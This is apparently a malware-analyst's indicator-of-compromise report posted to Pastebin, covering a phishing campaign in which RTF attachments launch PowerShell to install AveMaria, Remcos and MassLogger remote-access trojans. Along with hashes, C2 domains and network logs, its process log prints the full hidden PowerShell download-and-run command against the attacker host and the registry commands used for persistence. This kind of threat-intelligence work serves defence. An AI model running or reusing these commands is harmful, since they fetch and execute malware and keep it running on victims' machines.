VRad

#remcosrat_120721

Jul 13th, 2021 (edited)
646
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.78 KB | None | 0 0
  1. #IOC #OptiData #VR #avemaria #remcos #RTF #OLE #powershell
  2.  
  3. https://pastebin.com/ZYZarB9L
  4.  
  5. previous_contact:
  6. avemaria
  7. 20/07/20 https://pastebin.com/LV9NKUiy
  8. 17/02/20 https://pastebin.com/DCPutqaR
  9.  
  10. remcos
  11. 15/07/19 https://pastebin.com/ZxG6eRWM
  12.  
  13. FAQ:
  14. https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
  15.  
  16. attack_vector
  17. --------------
  18. email > attach .doc (RTF) > OLE > powershell > GET1 exe > %appdata%\svchost.exe > GET2 exe > %appdata%\FIemEnwKf.exe > exfil 37.0.11.114
  19.  
  20.  
  21. email_headers
  22. --------------
  23. Received: from gmail.com (unknown [37.0.8.157])
  24. From: Manager <[email protected]>
  25. Subject: URGENT: SUPPLY COMPLAIN / DAMAGES
  26. Date: 12 Jul 2021 02:47:46 -0700
  27. MIME-Version: 1.0
  28.  
  29.  
  30. files
  31. --------------
  32. [RTF1]
  33. *******
  34. SHA-256 0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85
  35. File name Picture1.doc [ Rich Text Format ]
  36. File size 662.29 KB (678183 bytes)
  37.  
  38. SHA-256 538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a
  39. File name svchost.exe [ .NET executable ] - AveMariaRAT
  40. File size 465.50 KB (476672 bytes)
  41.  
  42. SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
  43. File name explorer.exe [ Microsoft Visual C++ ]
  44. File size 92.00 KB (94208 bytes) - Remcos RAT
  45.  
  46.  
  47. [RTF2]
  48. *******
  49. SHA-256 68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95
  50. File name Picture2.doc [ Rich Text Format ]
  51. File size 662.30 KB (678199 bytes)
  52.  
  53. SHA-256 b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823
  54. File name powerpoint.exe [ .NET executable ] - masslogger
  55. File size 582.50 KB (596480 bytes)
  56.  
  57. SHA-256 04cde0c2284cc4dc8f8a5aeadafca6819ab9d11dfb76fb7f3a2fbbf91d3c0e5d
  58. File name svchost.exe [ .NET executable ]
  59. File size 684.00 KB (700416 bytes)
  60.  
  61. SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
  62. File name AFdCieIpH.exe [ Microsoft Visual C++ ]
  63. File size 92.00 KB (94208 bytes) - Remcos RAT
  64.  
  65.  
  66. activity
  67. **************
  68. PL_SCR httP://kqz.ugo.si/svchost.exe [RTF1]
  69. httP://kqz.ugo.si/powerpoint.exe [RTF2]
  70.  
  71. C2 byx.z86.ru 37.0.11.114
  72. hgoz.12v.si 37.0.11.114
  73.  
  74.  
  75. netwrk
  76. --------------
  77. [RTF1]
  78. *******
  79. 37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1 Mozilla/4.0
  80. 37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1
  81.  
  82.  
  83. [RTF2]
  84. *******
  85. 37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1 Mozilla/4.0
  86. 37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1
  87. 37.0.11.114 hgoz.12v.si GET /rem.exe HTTP/1.1 Mozilla/4.0
  88.  
  89. comp
  90. --------------
  91. [RTF1]
  92. *******
  93. WINWORD.EXE 3328 TCP 37.0.11.114 80 ESTABLISHED
  94. powershell.exe 3828 TCP 37.0.11.114 80 ESTABLISHED
  95.  
  96. svchost.exe 1404 TCP 37.0.11.114 5200 ESTABLISHED
  97. svchost.exe 1404 TCP 37.0.11.114 80 ESTABLISHED
  98. explorer.exe 2080 TCP 37.0.11.114 2404 ESTABLISHED
  99.  
  100.  
  101. [RTF2]
  102. *******
  103. WINWORD.EXE 3836 TCP 37.0.11.114 80 ESTABLISHED
  104. explorer.exe 3152 TCP 37.0.11.114 2404 ESTABLISHED
  105. svchost.exe 816 TCP 37.0.11.114 5200 ESTABLISHED
  106. svchost.exe 816 TCP 37.0.11.114 80 ESTABLISHED
  107.  
  108. proc
  109. --------------
  110. [RTF1]
  111. *******
  112. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  113. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
  114. C:\Users\operator\AppData\Roaming\svchost.exe
  115. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
  116. C:\tmp\svchost.exe
  117. C:\Users\operator\AppData\Roaming\svchost.exe
  118. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
  119. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  120. C:\Users\operator\AppData\Roaming\svchost.exe
  121. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
  122. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
  123. C:\Users\operator\AppData\Roaming\svchost.exe
  124. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
  125.  
  126. C:\Users\operator\AppData\Roaming\svchost.exe
  127. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
  128. C:\tmp\svchost.exe
  129. C:\tmp\svchost.exe
  130. C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
  131. C:\Windows\SysWOW64\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
  132. C:\Users\operator\AppData\Roaming\svchost.exe
  133. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
  134. C:\tmp\svchost.exe
  135. C:\Windows\SysWOW64\cmd.exe
  136. C:\Users\operator\AppData\Roaming\FIemEnwKf.exe
  137. C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
  138. C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
  139. C:\Users\operator\AppData\Roaming\windows\explorer.exe
  140.  
  141.  
  142. [RTF2]
  143. *******
  144. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  145. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/powerpoint.exe','C:\Users\operator\AppData\Roaming\powerpoint.exe');Start-Process 'C:\Users\operator\AppData\Roaming\powerpoint.exe'"
  146. C:\Users\operator\AppData\Roaming\powerpoint.exe
  147. C:\tmp\powerpoint.exe
  148. C:\tmp\powerpoint.exe
  149. C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
  150. C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
  151. C:\Users\operator\AppData\Roaming\svchost.exe
  152. C:\tmp\svchost.exe
  153. C:\tmp\svchost.exe
  154. C:\Windows\SysWOW64\cmd.exe
  155. C:\Users\operator\AppData\Roaming\AFdCieIpH.exe
  156. C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
  157. C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
  158. C:\Users\operator\AppData\Roaming\windows\explorer.exe
  159.  
  160. persist
  161. --------------
  162. [RTF1]
  163. *******
  164. HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 13.07.2021 10:39
  165. C:\Users\operator\AppData\Roaming\svchost.exe Firefox Mozilla c:\users\operator\appdata\roaming\svchost.exe 13.07.2021 0:03
  166.  
  167.  
  168. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:40
  169. pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
  170.  
  171.  
  172. [RTF2]
  173. *******
  174. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:37
  175. pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
  176.  
  177. drop
  178. --------------
  179. [RTF1]
  180. *******
  181. %appdata%\svchost.exe
  182. %tmp%\svchost.exe
  183.  
  184. %appdata%\FIemEnwKf.exe
  185. %appdata%\windows\explorer.exe
  186.  
  187. [RTF2]
  188. *******
  189. %appdata%\powerpoint.exe
  190. %tmp%\powerpoint.exe
  191. %tmp%\svchost.exe
  192. %appdata%\AFdCieIpH.exe
  193. %appdata%\windows\explorer.exe
  194.  
  195.  
  196. # # #
  197. VT details
  198.  
  199. RTF1
  200. *******
  201. https://www.virustotal.com/gui/file/0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85/details
  202. https://www.virustotal.com/gui/file/538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a/details
  203. https://www.unpac.me/results/b9e19690-4c56-4150-965d-8463b8505682
  204. https://analyze.intezer.com/analyses/9ef6d317-1ffe-4698-9a0e-9a96e1b7c0dd
  205. https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
  206. https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215
  207.  
  208. RTF2
  209. *******
  210. https://www.virustotal.com/gui/file/68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95/details
  211. https://www.virustotal.com/gui/file/b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823/details
  212. https://www.unpac.me/results/a2582bf5-9003-4650-bcbc-135f13d6c47c
  213. https://analyze.intezer.com/analyses/38ba4b0f-e0d8-4791-8fdb-59d31fca75c2
  214. https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
  215. https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215
  216.  
  217. VR
Add Comment
Please, Sign In to add comment